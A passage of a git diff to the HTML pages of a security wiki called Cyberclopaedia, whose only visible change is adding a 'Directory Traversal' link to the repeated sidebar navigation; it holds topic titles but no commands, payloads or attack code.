        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -188,22 +188,6 @@

SYN Scan

- - diff --git a/docs/Reconnaissance/Enumeration/Port Scanning/TCP Connect Scan.html b/docs/Reconnaissance/Enumeration/Port Scanning/TCP Connect Scan.html index 70aca4b9..78ac3b36 100644 --- a/docs/Reconnaissance/Enumeration/Port Scanning/TCP Connect Scan.html +++ b/docs/Reconnaissance/Enumeration/Port Scanning/TCP Connect Scan.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -179,22 +179,6 @@

TCP Connect - - diff --git a/docs/Reconnaissance/Enumeration/Port Scanning/index.html b/docs/Reconnaissance/Enumeration/Port Scanning/index.html index 17625689..60f2d67f 100644 --- a/docs/Reconnaissance/Enumeration/Port Scanning/index.html +++ b/docs/Reconnaissance/Enumeration/Port Scanning/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -234,22 +234,6 @@

Port States

- - diff --git a/docs/Reconnaissance/Enumeration/SNMP Enumeration (161).html b/docs/Reconnaissance/Enumeration/SNMP Enumeration (161).html index 10cf0399..2c986095 100644 --- a/docs/Reconnaissance/Enumeration/SNMP Enumeration (161).html +++ b/docs/Reconnaissance/Enumeration/SNMP Enumeration (161).html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
